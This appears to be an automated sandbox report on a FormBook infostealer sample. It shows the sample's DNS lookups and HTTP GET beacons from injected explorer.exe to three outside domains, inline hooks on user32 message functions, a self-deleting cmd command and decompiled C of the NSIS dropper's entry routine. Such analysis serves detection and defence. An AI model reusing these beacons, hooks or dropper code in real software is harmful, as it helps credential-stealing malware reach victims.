Jun 11, 2021 12:13:03.494420052 CEST	60151	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:13:03.554992914 CEST	53	60151	8.8.8.8	192.168.2.5
Jun 11, 2021 12:13:28.216379881 CEST	56969	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:13:28.287094116 CEST	53	56969	8.8.8.8	192.168.2.5
Jun 11, 2021 12:13:31.261404991 CEST	55161	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:13:31.329421043 CEST	53	55161	8.8.8.8	192.168.2.5
Jun 11, 2021 12:13:54.522371054 CEST	54757	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:13:54.586051941 CEST	53	54757	8.8.8.8	192.168.2.5
Jun 11, 2021 12:13:56.956886053 CEST	49992	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:13:57.103427887 CEST	53	49992	8.8.8.8	192.168.2.5
Jun 11, 2021 12:14:18.308631897 CEST	60075	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:14:18.373300076 CEST	53	60075	8.8.8.8	192.168.2.5
Jun 11, 2021 12:14:22.118520975 CEST	55016	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:14:22.179194927 CEST	53	55016	8.8.8.8	192.168.2.5
Jun 11, 2021 12:14:38.757014036 CEST	64345	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:14:38.936023951 CEST	53	64345	8.8.8.8	192.168.2.5
Jun 11, 2021 12:14:39.369801044 CEST	57128	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:14:39.447465897 CEST	53	57128	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 11, 2021 12:13:56.956886053 CEST	192.168.2.5	8.8.8.8	0x3c07	Standard query (0)	www.northsytyle.com	A (IP address)	IN (0x0001)
Jun 11, 2021 12:14:18.308631897 CEST	192.168.2.5	8.8.8.8	0x40ab	Standard query (0)	www.shitarpa.net	A (IP address)	IN (0x0001)
Jun 11, 2021 12:14:38.757014036 CEST	192.168.2.5	8.8.8.8	0x6540	Standard query (0)	www.houseofsisson.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 11, 2021 12:13:57.103427887 CEST	8.8.8.8	192.168.2.5	0x3c07	No error (0)	www.northsytyle.com		199.59.242.153	A (IP address)	IN (0x0001)
Jun 11, 2021 12:14:18.373300076 CEST	8.8.8.8	192.168.2.5	0x40ab	No error (0)	www.shitarpa.net	shitarpa.net		CNAME (Canonical name)	IN (0x0001)
Jun 11, 2021 12:14:18.373300076 CEST	8.8.8.8	192.168.2.5	0x40ab	No error (0)	shitarpa.net		34.102.136.180	A (IP address)	IN (0x0001)
Jun 11, 2021 12:14:38.936023951 CEST	8.8.8.8	192.168.2.5	0x6540	No error (0)	www.houseofsisson.com	houseofsisson.com		CNAME (Canonical name)	IN (0x0001)
Jun 11, 2021 12:14:38.936023951 CEST	8.8.8.8	192.168.2.5	0x6540	No error (0)	houseofsisson.com		170.39.76.111	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.northsytyle.com

www.shitarpa.net

www.houseofsisson.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49719	199.59.242.153	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 11, 2021 12:13:57.288475990 CEST	5091	OUT	GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W HTTP/1.1 Host: www.northsytyle.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 11, 2021 12:13:57.415965080 CEST	5092	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 11 Jun 2021 10:13:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CWASVN2Fkx8Lz77aRYdiQgq6MDgGAsj0QbR5uqnRq7VXF0P0RHizFVKPsOkX86dPOS7L9FeqbRKHFNclm7c8RQ== Data Raw: 66 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 57 41 53 56 4e 32 46 6b 78 38 4c 7a 37 37 61 52 59 64 69 51 67 71 36 4d 44 67 47 41 73 6a 30 51 62 52 35 75 71 6e 52 71 37 56 58 46 30 50 30 52 48 69 7a 46 56 4b 50 73 4f 6b 58 38 36 64 50 4f 53 37 4c 39 46 65 71 62 52 4b 48 46 4e 63 6c 6d 37 63 38 52 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65 Data Ascii: ff9<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CWASVN2Fkx8Lz77aRYdiQgq6MDgGAsj0QbR5uqnRq7VXF0P0RHizFVKPsOkX86dPOS7L9FeqbRKHFNclm7c8RQ=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)\|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one
Jun 11, 2021 12:13:57.415990114 CEST	5094	IN	Data Raw: 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 61 7a 78 2e 73 65 61 72 63 68 21 3d 3d 27 3f 7a 27 29 7b 61 7a 78 2e 68 72 65 66 3d 27 2f 3f 7a 27 3b 7d 7d 3b 44 44 2e 6f 6e 6c 6f 61 64 3d 44 44 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 Data Ascii: rror=function(){if(azx.search!=='?z'){azx.href='/?z';}};DD.onload=DD.onreadystatechange=function(){if(!aAC&&LU){if(!window['googleNDT_']){}LU(google.ads.domains.Caf);}aAC=true;};DT.body.appendChild(DD);return{azm:function(n$){if(aAC)n$(goog
Jun 11, 2021 12:13:57.416002035 CEST	5095	IN	Data Raw: 2c 52 72 3d 77 69 6e 64 6f 77 2c 61 7a 78 3d 52 72 2e 6c 6f 63 61 74 69 6f 6e 2c 61 41 42 3d 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2c 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 53 66 3d 44 54 2e 62 6f 64 79 7c 7c 44 54 2e 67 65 74 45 6c 65 6d 65 6e 74 73 Data Ascii: ,Rr=window,azx=Rr.location,aAB=top.location,DT=document,Sf=DT.body\|\|DT.getElementsByTagName('body')[0],aAy=0,aAx=0,aAz=0,$IE=null;if(Sf.className==='ie6')$IE=6;else if(Sf.className==='ie7')$IE=7;else if(Sf.className==='ie8')$IE=8;else if(Sf
Jun 11, 2021 12:13:57.416013002 CEST	5096	IN	Data Raw: 67 5f 70 64 2e 72 5f 77 68 3a 27 26 77 68 3d 27 2b 61 41 78 29 2b 0a 28 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 21 3d 3d 65 66 3f 27 26 72 65 66 5f 6b 65 79 77 6f 72 64 3d 27 2b 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 3a 27 27 29 Data Ascii: g_pd.r_wh:'&wh='+aAx)+(g_pd.ref_keyword!==ef?'&ref_keyword='+g_pd.ref_keyword:'')+(g_pc.$isWhitelisted()?'&abp=1':'')+($IE!==null?'&ie='+$IE:'')+(g_pd.partner!==ef?'&partner='+g_pd.partner:'')+(g_pd.subid1!==ef?'&subid1='+g_pd.subid1:'')+
Jun 11, 2021 12:13:57.416026115 CEST	5096	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49720	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 11, 2021 12:14:18.417414904 CEST	5097	OUT	GET /dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e HTTP/1.1 Host: www.shitarpa.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 11, 2021 12:14:18.562024117 CEST	5098	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 11 Jun 2021 10:14:18 GMT Content-Type: text/html Content-Length: 275 ETag: "60ba4131-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49722	170.39.76.111	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 11, 2021 12:14:39.094999075 CEST	5110	OUT	GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT HTTP/1.1 Host: www.houseofsisson.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 11, 2021 12:14:39.417160988 CEST	5114	IN	HTTP/1.1 301 Moved Permanently Connection: close Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT Content-Length: 0 Date: Fri, 11 Jun 2021 10:14:39 GMT Server: LiteSpeed

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xE2
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xE2
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xE2
GetMessageA	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xE2

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 2435.exe PID: 6304 Parent PID: 5732

General

Start time:	12:12:43
Start date:	11/06/2021
Path:	C:\Users\user\Desktop\2435.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\2435.exe'
Imagebase:	0x400000
File size:	241748 bytes
MD5 hash:	862B4C2ABAD2C07AC13D5E051C18AB86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: 2435.exe PID: 6340 Parent PID: 6304

General

Start time:	12:12:44
Start date:	11/06/2021
Path:	C:\Users\user\Desktop\2435.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\2435.exe'
Imagebase:	0x400000
File size:	241748 bytes
MD5 hash:	862B4C2ABAD2C07AC13D5E051C18AB86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3472 Parent PID: 6340

General

Start time:	12:12:49
Start date:	11/06/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: control.exe PID: 6932 Parent PID: 3472

General

Start time:	12:13:09
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\control.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\control.exe
Imagebase:	0x340000
File size:	114688 bytes
MD5 hash:	40FBA3FBFD5E33E0DE1BA45472FDA66F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 3584 Parent PID: 6932

General

Start time:	12:13:14
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\2435.exe'
Imagebase:	0xeb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6292 Parent PID: 3584

General

Start time:	12:13:15
Start date:	11/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 2435.exe PID: 6304 Parent PID: 5732 2435.exeCOMMON

Executed Functions

Function 0040323C, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270
filestringcomCOMMON

Download Yara Rule

C-Code - Quality: 82%

			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405E88(8);
				SHGetFileInfoA(0x41f458, 0,  &_v360, 0x160, 0); // executed
				E00405B66(0x4236a0, "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\alfons\\Desktop\\2435.exe\" ";
				E00405B66(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\alfons\\Desktop\\2435.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E00405684(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E00405684(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E00405B66("C:\\Users\\alfons\\AppData\\Local\\Temp", _t44 + 2);
								L20:
								_t105 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105); // executed
								_t48 = E00403208(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C72(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035BD();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34;
											if( *0x423f34 != 0) {
												_t106 = E00405E88(3);
												_t100 = E00405E88(4);
												_t55 = E00405E88(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c;
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405427(_v408, 0x200010);
										ExitProcess(2);
									}
									if( *0x423ebc == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004036AF();
										goto L32;
									}
									_t103 = E00405684(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										if(lstrcmpiA(_t105, "C:\\Users\\alfons\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405B66("C:\\Users\\alfons\\AppData\\Local\\Temp", "C:\\Users\\alfons\\Desktop");
										}
										E00405B66(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x120)));
											DeleteFileA(0x41f058);
											if(_v416 != 0 && CopyFileA("C:\\Users\\alfons\\Desktop\\2435.exe", 0x41f058, 1) != 0) {
												_push(0);
												_push(0x41f058);
												E004058B4();
												E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x124)));
												_t79 = E004053C6(0x41f058);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004058B4();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
